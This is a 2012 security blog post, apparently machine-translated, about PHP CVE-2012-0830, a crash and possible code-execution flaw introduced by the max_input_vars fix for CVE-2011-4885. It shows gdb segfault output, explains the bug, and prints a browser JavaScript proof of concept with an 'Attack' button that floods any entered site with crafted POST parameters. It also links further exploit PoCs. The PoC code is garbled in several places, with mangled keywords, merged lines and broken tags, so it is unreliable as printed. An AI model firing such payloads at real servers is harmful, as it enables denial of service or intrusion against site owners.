ClsHack:Computer Security Blog    

PHP 5.3.* likes DOS Vulnerabilities

Posted on: 3 February 2012

Almost all part of the CVE-2011-4885 PHP Hashtables Denial of Service that says this:

PHP before 5.3.9 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.

With the upgrade to version PHP 5.3.9 introduces the bug fix:

Added max_input_vars directive to prevent attacks based on hash collisions (Dmitry).

max_input_vars My example is configurable via php.ini:

This, max_input_vars however, introduces a new bug: CVE-2012-0830

A remote attacker could send large number of crafted POST requests, which could
crash php or execute arbitrary code with the permissions of the user running
php.

cat test.php
<?php
print_r( $_GET );
?>

(gdb) run -d max_input_vars=1 /tmp/test.php a[]=1 v[]=2
Starting program: /usr/bin/php-cgi -d max_input_vars=1 /tmp/test.php a[]=1 v[]=2
[Thread debugging using libthread_db enabled]
PHP Warning: Unknown: Input variables exceeded 1. To increase the limit change max_input_vars in php.ini. in Unknown on line 0
PHP Warning: Unknown: Input variables exceeded 1. To increase the limit change max_input_vars in php.ini. in Unknown on line 0
Program received signal SIGSEGV, Segmentation fault.
0x000000000063cb5e in php_register_variable_ex ()
(gdb) ^CQuit

clshack@lb:~$ php-cgi --version
PHP 5.3.9-6~oneiric+2 (cgi-fcgi) (built: Feb 1 2012 15:51:44)
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2012 Zend Technologies
clshack@lb:~$

Where the vulnerability is as follows:

The vulnerability happens when the number of variables exceeds max_input_vars and the variable is an array variable (if (*p == ‘[')). Instead of an else case which would stop and return, the code is allowed to continue executing. The code continues to execute up to line 207, the second highlighted line. At line 207, it is calling a macro Z_ARRVAL_PP to get a reference to the updated hashtable. This is where the code execution can occur.

Where the poc for a remote site, with the max_input_vars to 1000 [edit by clshack v.v ]:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict / / EN"
	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd ">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang = "en" lang = "en">
<head>
	<title>senza nome</title>
	<meta http-equiv="content-type" content="text/html;charset=utf-8" />
	<script>

		// Simple proof of concept for PHP bug (CVE-2012-0830) described by Stefan Esser (@i0n1c)
		// http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/
		// Generate 1000 normal keys and one array
		function createEvilObj () {
			was evil_obj = {};
			for (where i = 0; i < 1001; i  ) {
				evil_obj[i] = 1;
			}
			evil_obj['kill[]'] = 'kill';
			return evil_obj;
		}
		// Serialize Javascript object into POST data
		function serializeObj (obj) {
			var str = [];
			for(where forn obj) {
				str.push(p + "=" objbj[p]);
			}
			return str.join("&");
		}
		// Run attack
		function attackSite (site)
		{
			var = bad serializeObj(createEvilObj());
			var xhr = new XMLHttpRequest();
			xhr.open("POST", site, true);
			xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
			xhr.setRequestHexhr.setRequestHeader', bad.lengthead			xhr.send(bad);

		}
	</script>
</head>

<boscript
	<input type='text' id='site' value='http://www.example.com'  name='site' >
	<button onclick='attackSite(document.getElementById("site").value);'> Attack</button>
</body>
<'&gbody

As for the poc CVE-2011-4885 is available here:
http://www.exploit-db.com/exploits/18296/
And then there is for PHP 5.4SVN-2012-02-03 a buffer overflow on the function htmlspecialchars / entities:
Poc:
http://www.exploit-db.com/exploits/18458/

References:

http://pastebin.com/qWBrq0A3

http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/

http://www.exploit-db.com

Related posts:

  1. RIPS:source code analyser for vulnerabilities in PHP
  2. [WordPress]Released WP-SENTINEL 2.0
  3. Tools for search DLL Hijacking Vulnerabilities

This entry was posted on Friday, February 3rd, 2012 at 4:07 pm and is filed under Hacking, Programming. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Tagged with: